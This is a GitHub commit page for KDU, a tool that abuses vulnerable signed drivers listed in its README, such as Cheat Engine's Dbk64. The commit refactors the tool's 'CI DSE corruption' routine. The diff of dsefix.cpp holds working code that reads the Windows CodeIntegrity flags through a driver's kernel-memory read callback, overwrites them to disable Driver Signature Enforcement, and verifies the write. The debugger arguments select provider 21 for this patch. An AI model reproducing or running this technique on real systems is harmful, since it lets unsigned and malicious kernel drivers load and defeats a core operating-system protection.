v 1.2.0

Custom DSE patch callbacks Custom DSE patch callback added for provider 21 (Cheat Engine's DBK)
AltmanMusk · Feb 17, 2022 · d7e0714 · d7e0714
1 parent a81c4d1
commit d7e0714
Show file tree

Hide file tree

Showing 17 changed files with 435 additions and 173 deletions.
diff --git a/Bin/kdu.exe b/Bin/kdu.exe
diff --git a/KDU.sha256 b/KDU.sha256
@@ -1,7 +1,7 @@
 7e405bf2a4c4b851e7665a37f5b0a791d04f48e9d40ee7a1063db27fb3898709 *Bin\drv64.dll
 293cb9a86a3f89e377ef5c6716d70bbdfd9c57ff0a07d484bd8abc1f521e70cc *Bin\dummy.sys
 82370b38b940f98013a6506a82c35913ec810f312d93b93b5406f3caf07bda9f *Bin\dummy2.sys
-cb93eced4f69c384124af2fd46f1794238f6f740e998e81faaca79cdbe7c75d6 *Bin\kdu.exe
+934202b339ecd88418ef2d31061e0ff39eba926907d5a55454dd2bf8de643c50 *Bin\kdu.exe
 751d35646474f1854972d6cc45c5b7419933e36fabe013eba785f276ec566d25 *Bin\license.txt
 323d910f93683453d45239a0528d3c3cda7f2608fca864fd2a687184ffe129fe *Help\kdu1.png
 a1d7a51549914833a3414a93646952c25deabe072d8a271b54e10727f923b479 *Help\kdu2.png
@@ -32,29 +32,29 @@ f12057a99c6b20abf6d9c3df949d794b124ca19b189498ce2beaa5beeb2b077c *Source\Hamakaz
 64b85353dd48547856d1c82af0f8d5bd3387a6599ec67303c64457d8610a9a41 *Source\Hamakaze\consts.h
 0be929e99bfa8adafe9f1d54862dfe338d7b178c44807bec4498fca32351b1b4 *Source\Hamakaze\drvmap.cpp
 2effbb4edc790ac57606a82d3755e26a5a9661884107f474bb3bdd2217bdc260 *Source\Hamakaze\drvmap.h
-bbe92082740904e98938dbf615ca5c90fecc436eba56b4de01a50e4879bd1b3e *Source\Hamakaze\dsefix.cpp
-c8b1ae58b617d925bf2a19fd5c0a21071f653458d175482c2f2e74b55ecb6066 *Source\Hamakaze\dsefix.h
+feabfafd122d6fa542c5113769828f0f44bd1c6c08c8f7731c770a18a41bd8d3 *Source\Hamakaze\dsefix.cpp
+d46e3371c568c92493d4a2553327c9a703ccf0b68e26ccc9ed49772524e12b71 *Source\Hamakaze\dsefix.h
 7f53d0a7cb3cbd7c63bbb101344bfce7e8498252e0e537c33c1079eb7dc1c63e *Source\Hamakaze\global.h
 1e777eaa57e45768c4c318e8264ed5faa4941f56e93ba07456992daf7c8b982e *Source\Hamakaze\ipcsvc.cpp
 888a436b666b00592d29e8a2e82a9b5c7f0c1d4890aaab8cb2f623181ad07092 *Source\Hamakaze\ipcsvc.h
 28852719cb7b5def5cb0667d9de9072f41ea3cd55ef92abf3697a32c487131b1 *Source\Hamakaze\KDU.vcxproj
 dd85c4bc40199343726a2a82209713abd1fb41079d1721625d3cd96bc1b33ea6 *Source\Hamakaze\KDU.vcxproj.filters
-a576f2eb7d6185b95c40bade248168f1f7b39fadc6bb1f234b7ba0052177fda0 *Source\Hamakaze\KDU.vcxproj.user
-fcdb040c410d82ba34780bd4bc5c293613b90b6df6a7347e33fc16961d716283 *Source\Hamakaze\kduplist.h
-89e63820780a5b2d61a8b83070a93230fd03523363dabbdfd17aac5b744c4a6c *Source\Hamakaze\kduprov.cpp
-151b6fcba1f21649e875a1a3bc7da075a665c3fb80d4cbeb366889fd1c94c5e9 *Source\Hamakaze\kduprov.h
-a6f9bca5f12644a5de17399b122735571068e8a25e39e5eba31a379bf8d32464 *Source\Hamakaze\main.cpp
+694256006711a66f650b3a08f7cfc4c45c6fdbf7add49fecf611f5feba2a9f92 *Source\Hamakaze\KDU.vcxproj.user
+996a662d691c6cfb46400ec8e75937b84ff160c993e4da0bc5061df9dff85097 *Source\Hamakaze\kduplist.h
+1f2f1feb2e97594ad7f03fe82f4db3e69121816431e4579040113c8181b41297 *Source\Hamakaze\kduprov.cpp
+19292faca56c6a99eae9869b2194ad768cea46b84e3d9216a6521818b6c0a072 *Source\Hamakaze\kduprov.h
+059074722ee621923d53e036452d24ba401cbed042fa36a896baff2c858f46ae *Source\Hamakaze\main.cpp
 e1a8de39e2d3d0bae5d9bbe1b18e849f5d070feb1d37f838176ede5a401f35ec *Source\Hamakaze\pagewalk.cpp
 545ecf7e669b6b28753a02e33fae6f503750d26cf0bf9089701f401fd24e0dd1 *Source\Hamakaze\pagewalk.h
-b213bcd339db20dddd8b0acfe53c964b805b3ca53f7214a09e5e04befb9e4b46 *Source\Hamakaze\ps.cpp
+c68451b1f7981eefd8ba6e79cb92bc11416c6e942d72bab83bc5096ac853dbd6 *Source\Hamakaze\ps.cpp
 6c9e5a15f9d01db4b50ac06b723d4fe9468e2bb02eb8ba77c4bfecf8d83f1f8e *Source\Hamakaze\ps.h
 6ab34cc400e37c37605e0b04b076f9464172c6e1ae749b19f7d0c73f2d7177e3 *Source\Hamakaze\resource.h
 9816b5d056716f328ad8a13d8d5384dc47b51dbfe4d213abbca2feac6b4cc30c *Source\Hamakaze\resource.rc
 6c8175868f7291676b0fe1704f3aff60f7fe2af765fe3ced6a568d182124f499 *Source\Hamakaze\shellcode.cpp
-09deca47f82bf83950becc2992fc9b8dabd0aef86a48ad50f80b2c3bc5745948 *Source\Hamakaze\shellcode.h
+307c1a8c1e9cbc135f981f99859387af3fdd04c928c76654789086d7633ceed1 *Source\Hamakaze\shellcode.h
 3d84a26f0de605c68a84c52bf21103dd90260a43a71dbd7e86f7e290b8fd49bc *Source\Hamakaze\sup.cpp
 f85e934795129edb4dd106ab75f8038ccbb064d99ccdb38deb5a50bd839f9be6 *Source\Hamakaze\sup.h
-edd9edf5b7560fe0463a0f8d30cf750dbc694b381e7b368797cf6af2a5f4d83a *Source\Hamakaze\tests.cpp
+f28306a5b655a37a664169d8a12ab08ac16d4c6521e97a2d8a01136a97cecab9 *Source\Hamakaze\tests.cpp
 ad77ae168188a9748713ab5f7532447ca50a539fa8ebbec5ac86b273696b028e *Source\Hamakaze\tests.h
 2f9bba7bf761a8e6908132ae93d81aaaa38cbdebd38e2557505ea6309bbd2391 *Source\Hamakaze\victim.cpp
 b4165a29658b4770627aaac15bc36add0a47892d738920de1fc6ec73bb1c3cce *Source\Hamakaze\victim.h
@@ -65,8 +65,8 @@ fd5b39e2865e12b9525ebda8fd9e9658b341ead5932d1bcb412a189f81ca42ca *Source\Hamakaz
 0b6c69ad498e67907e0c574ab06123aee4ec30c99fa181099ea929a8d820bfc1 *Source\Hamakaze\hde\table64.h
 b1350783a851e6345b880c8a5313e871d2249aa5524f41406c52fa62483f2229 *Source\Hamakaze\idrv\atszio.cpp
 015a6aff991174a881650c61fe1b28c5bfe3116a02a32abe5295ff389c5b7099 *Source\Hamakaze\idrv\atszio.h
-bfd72675036395c0aecf9a910b93da943b858441b0963f843d97fcc8570be29c *Source\Hamakaze\idrv\dbk.cpp
-7f227031bf0ea01f079521f6eb9593b562b4304d255261f9b27825d0fef20bae *Source\Hamakaze\idrv\dbk.h
+c5b615215ed900918986a1309e4d844535e27331246531c3307834cb388597b6 *Source\Hamakaze\idrv\dbk.cpp
+24f81b4fdc1b924a36c981fb175b2dccebd7d029d6caed85fb731b74b22c7386 *Source\Hamakaze\idrv\dbk.h
 f1e50ca998f4dde600b062fe0f89ba0289b5c69b5636608db95eeb753c444a2a *Source\Hamakaze\idrv\dbutil.cpp
 ad955406989b80564e7e4cc400721e62d6d5c193e22037b075e07dd616f3c845 *Source\Hamakaze\idrv\dbutil.h
 221647ebf885a79ca375668bffc0cf104785e21be6d5911ddf5bf1e437f38e7b *Source\Hamakaze\idrv\directio64.cpp
@@ -75,7 +75,7 @@ ad955406989b80564e7e4cc400721e62d6d5c193e22037b075e07dd616f3c845 *Source\Hamakaz
 89d1cfb34afec23dbda6f40030a95386e9bbbc395666e2c0a3d066dc2fa8b0b8 *Source\Hamakaze\idrv\gmer.h
 ae9dd179c7fdc2b1a4741399e64fa9d4a13d22b7fad45cedea9ce285fe7399ea *Source\Hamakaze\idrv\kph.cpp
 4bcb0021a14e1d793d9df9f91c4fd261885f4583d36d350661e604fdf407f5d8 *Source\Hamakaze\idrv\kph.h
-d0fe9c15fa8bf834d19c840b29fe0211e2a7235e68214896aadfa15e33831ef4 *Source\Hamakaze\idrv\ldrsc.h
+f3c889ede5142f88b54d3e5e973b46f0fb897d306695de82df9c683f72774fb8 *Source\Hamakaze\idrv\ldrsc.h
 8bcc062ab27f293c35df032340e761f18013d978fd3df33fbaca3a30a2726b5f *Source\Hamakaze\idrv\lha.cpp
 dcb5da7acb4997abbde8372a8daf74dae5727ca5cbf80b26876fdb4cb2a0bc08 *Source\Hamakaze\idrv\lha.h
 af3281bf9ab1b6693296baa6b0cee502c2b8d8660bdd3289fbfba16dc9cc3803 *Source\Hamakaze\idrv\mapmem.cpp
@@ -132,7 +132,7 @@ dd06a7140e1cd61a888c5b035120175e307be6767d44e15d0b353c4aa2a980ce *Source\Taigei\
 6c12bf0d697d624a35a8b233a2ee8cfb91db8aa6a6f5cc71142d3d1de98b42b4 *Source\Taigei\global.h
 ab6d1318079253cf388477ea2190837513345dd6a6a731f022e73c80ea806d58 *Source\Taigei\ipc.cpp
 6711ef2aa6e396743d3a42adf9a901784e4d880fa07ef88873c41bdd4261ac35 *Source\Taigei\ipc.h
-ce45632484d38d1321d0c164bffa67f03692b5a44ebbc4d8a382842103387eec *Source\Taigei\main.cpp
+3634d1725df134897618a080e43de72369011a0e118b471b064bf64e3a544ceb *Source\Taigei\main.cpp
 2bbfb50690eb8bccd5ca9e369519e1b63f1d0460e9a09ae660d2b259d533e38d *Source\Taigei\Taigei.vcxproj
 d563bd3017a274175ca6b7e8f93333a3e3ec096d1f3034acfa4e17d8b2420c99 *Source\Taigei\Taigei.vcxproj.filters
 c06a75b13f855a94d46616796e024c52b499f8f92cf00ccb571ddbc6ff574676 *Source\Taigei\Taigei.vcxproj.user
@@ -146,7 +146,7 @@ e920037c5923d62b4da7c70df62d05a0e341ef19b9c26538de435ae5cec51cf3 *Source\Tanikaz
 db3ebc1c1aa2779adaedc21480e2ad78ae135a467ad78fa6d48a00575fc0e34c *Source\Tanikaze\data\dbutilinf.bin
 ad5544f93b70690e66489bb6c584b28045ed892a2ea8f6149e3ed09dd36bf71b *Source\Tanikaze\data\KMUEXE.bin
 a8df0de9fd2f304161038a353bce200fd27009f6bba5dee0eb433a55b9facc6c *Source\Tanikaze\data\KMUSIG.bin
-8f37395f31486996e79b29f841efbb8a0b9580a4b24ef352a84b8e09d6e5d8ed *Source\Tanikaze\drv\AsIO2.bin
+8f37395f31486996e79b29f841efbb8a0b9580a4b24ef352a84b8e09d6e5d8ed *Source\Tanikaze\drv\asio2.bin
 d2a3cab1c5acf6b2b45482d80fe78a46bf15ed22f17b088a832d6027f15afb67 *Source\Tanikaze\drv\AsIO3.bin
 fa22f886bd2e3e835d009f32dd54e265b41e31e9a44beff66146756c3277c435 *Source\Tanikaze\drv\ATSZIO64.bin
 e5459398bf19e711ea13a6289518b4f009557d15b5d0bd0131283e927f1eb8ab *Source\Tanikaze\drv\dbk64.bin

diff --git a/README.md b/README.md
@@ -119,7 +119,7 @@ You use it at your own risk. Some lazy AV may flag this tool as hacktool/malware
 | 19          | Microsoft      | ProcExp152  | Process Explorer                   | Original          | 1.5.2 and below             |
 | 20          | Dell           | DBUtilDrv2  | Dell BIOS Utility                  | Original          | 2.7 and below               |
 | 21          | DarkByte       | Dbk64       | Cheat Engine                       | Original          | 7.4 and below               |
-| 22          | ASUSTeK        | AsIO3       | ASUS GPU TweakII                   | WINIO             | 2.3.0.3                     |
+| 22          | ASUSTeK        | AsIO3       | ASUS GPU Tweak II / III            | WINIO             | 2.3.0.3                     |
 
 More providers maybe added in the future.
 

diff --git a/Source/Hamakaze/KDU.vcxproj.user b/Source/Hamakaze/KDU.vcxproj.user
@@ -1,11 +1,11 @@
 <?xml version="1.0" encoding="utf-8"?>
 <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <LocalDebuggerCommandArguments>-prv 22 -map c:\makeexe\kdu\bin\dummy.sys</LocalDebuggerCommandArguments>
+    <LocalDebuggerCommandArguments>-test</LocalDebuggerCommandArguments>
     <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <LocalDebuggerCommandArguments>-prv 22 -map c:\makeexe\kdu\bin\dummy.sys</LocalDebuggerCommandArguments>
+    <LocalDebuggerCommandArguments>-prv 21 -dse 6</LocalDebuggerCommandArguments>
     <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
   </PropertyGroup>
 </Project>
diff --git a/Source/Hamakaze/dsefix.cpp b/Source/Hamakaze/dsefix.cpp
@@ -1,12 +1,12 @@
 /*******************************************************************************
 *
-*  (C) COPYRIGHT AUTHORS, 2014 - 2021
+*  (C) COPYRIGHT AUTHORS, 2014 - 2022
 *
 *  TITLE:       DSEFIX.CPP
 *
-*  VERSION:     1.11
+*  VERSION:     1.20
 *
-*  DATE:        14 May 2021
+*  DATE:        14 Feb 2022
 *
 *  CI DSE corruption related routines.
 *  Based on DSEFix v1.3
@@ -290,15 +290,15 @@ NTSTATUS KDUQueryCiOptions(
 }
 
 /*
-* KDUQueryVariable
+* KDUQueryCodeIntegrityVariableAddress
 *
 * Purpose:
 *
-* Find variable address.
+* Find CI variable address.
 * Depending on NT version search in ntoskrnl.exe or ci.dll
 *
 */
-ULONG_PTR KDUQueryVariable(
+ULONG_PTR KDUQueryCodeIntegrityVariableAddress(
     _In_ ULONG NtBuildNumber
 )
 {
@@ -414,104 +414,94 @@ ULONG_PTR KDUQueryVariable(
 *
 * Purpose:
 *
-* Change ntoskrnl.exe g_CiEnabled or CI.dll g_CiOptions state.
+* Change Windows CodeIntegrity flags state.
 *
 */
 BOOL KDUControlDSE(
     _In_ PKDU_CONTEXT Context,
-    _In_ ULONG DSEValue
+    _In_ ULONG DSEValue,
+    _In_ ULONG_PTR Address
 )
 {
     BOOL bResult = FALSE;
-    ULONG_PTR variableAddress;
     ULONG ulFlags = 0;
 
     FUNCTION_ENTER_MSG(__FUNCTION__);
 
-    variableAddress = KDUQueryVariable(Context->NtBuildNumber);
-    if (variableAddress == 0) {
+    //
+    // Read current flags state.
+    //
+    bResult = Context->Provider->Callbacks.ReadKernelVM(Context->DeviceHandle,
+        Address,
+        &ulFlags,
+        sizeof(ulFlags));
 
+    if (!bResult) {
         supPrintfEvent(kduEventError,
-            "[!] Could not query system variable address, abort.\r\n");
+            "[!] Could not query DSE state, GetLastError %lu\r\n",
+            GetLastError());
 
     }
     else {
 
-        //
-        // Read current flags state.
-        //
-        bResult = Context->Provider->Callbacks.ReadKernelVM(Context->DeviceHandle,
-            variableAddress,
-            &ulFlags,
-            sizeof(ulFlags));
-
-        if (!bResult) {
-            supPrintfEvent(kduEventError,
-                "[!] Could not query DSE state, GetLastError %lu\r\n",
-                GetLastError());
+        printf_s("[+] DSE flags (0x%p) value: %lX, new value to be written: %lX\r\n",
+            (PVOID)Address,
+            ulFlags,
+            DSEValue);
 
+        if (DSEValue == ulFlags) {
+            printf_s("[~] Warning, current value is identical to what you want to write\r\n");
         }
-        else {
-
-            printf_s("[+] DSE flags (0x%p) value: %lX, new value to be written: %lX\r\n",
-                (PVOID)variableAddress,
-                ulFlags,
-                DSEValue);
-
-            if (DSEValue == ulFlags) {
-                printf_s("[~] Warning, current value is identical to what you want to write\r\n");
-            }
-
-            DWORD dwLastError;
 
-            bResult = Context->Provider->Callbacks.WriteKernelVM(Context->DeviceHandle,
-                variableAddress,
-                &DSEValue,
-                sizeof(DSEValue));
+        DWORD dwLastError;
 
-            dwLastError = GetLastError();
+        bResult = Context->Provider->Callbacks.WriteKernelVM(Context->DeviceHandle,
+            Address,
+            &DSEValue,
+            sizeof(DSEValue));
 
-            if (bResult) {
+        dwLastError = GetLastError();
 
-                printf_s("[+] Kernel memory write complete, verifying data\r\n");
+        if (bResult) {
 
-                //
-                // Verify write.
-                //
-                ulFlags = 0;
-                bResult = Context->Provider->Callbacks.ReadKernelVM(Context->DeviceHandle,
-                    variableAddress,
-                    &ulFlags,
-                    sizeof(ulFlags));
+            printf_s("[+] Kernel memory write complete, verifying data\r\n");
 
-                dwLastError = GetLastError();
+            //
+            // Verify write.
+            //
+            ulFlags = 0;
+            bResult = Context->Provider->Callbacks.ReadKernelVM(Context->DeviceHandle,
+                Address,
+                &ulFlags,
+                sizeof(ulFlags));
 
-                if (bResult) {
+            dwLastError = GetLastError();
 
-                    bResult = (ulFlags == DSEValue);
+            if (bResult) {
 
-                    supPrintfEvent(
-                        (bResult == FALSE) ? kduEventError : kduEventInformation,
-                        "%s Write result verification %s\r\n",
-                        (bResult == FALSE) ? "[!]" : "[+]",
-                        (bResult == FALSE) ? "failed" : "succeeded");
+                bResult = (ulFlags == DSEValue);
 
+                supPrintfEvent(
+                    (bResult == FALSE) ? kduEventError : kduEventInformation,
+                    "%s Write result verification %s\r\n",
+                    (bResult == FALSE) ? "[!]" : "[+]",
+                    (bResult == FALSE) ? "failed" : "succeeded");
 
-                }
-                else {
-                    supPrintfEvent(kduEventError,
-                        "[!] Could not verify kernel memory write, GetLastError %lu\r\n",
-                        dwLastError);
 
-                }
             }
             else {
                 supPrintfEvent(kduEventError,
-                    "[!] Error while writing to the kernel memory, GetLastError %lu\r\n",
+                    "[!] Could not verify kernel memory write, GetLastError %lu\r\n",
                     dwLastError);
-            }
 
+            }
+        }
+        else {
+            supPrintfEvent(kduEventError,
+                "[!] Error while writing to the kernel memory, GetLastError %lu\r\n",
+                dwLastError);
         }
+
     }
 
     FUNCTION_LEAVE_MSG(__FUNCTION__);

diff --git a/Source/Hamakaze/dsefix.h b/Source/Hamakaze/dsefix.h
@@ -1,12 +1,12 @@
 /*******************************************************************************
 *
-*  (C) COPYRIGHT AUTHORS, 2014 - 2021
+*  (C) COPYRIGHT AUTHORS, 2014 - 2022
 *
 *  TITLE:       DSEFIX.H
 *
-*  VERSION:     1.10
+*  VERSION:     1.20
 *
-*  DATE:        02 Apr 2021
+*  DATE:        14 Feb 2022
 *
 *  CI DSE corruption prototypes and definitions.
 *
@@ -19,6 +19,10 @@
 
 #pragma once
 
+ULONG_PTR KDUQueryCodeIntegrityVariableAddress(
+    _In_ ULONG NtBuildNumber);
+
 BOOL KDUControlDSE(
     _In_ PKDU_CONTEXT Context,
-    _In_ ULONG DSEValue);
+    _In_ ULONG DSEValue,
+    _In_ ULONG_PTR Address);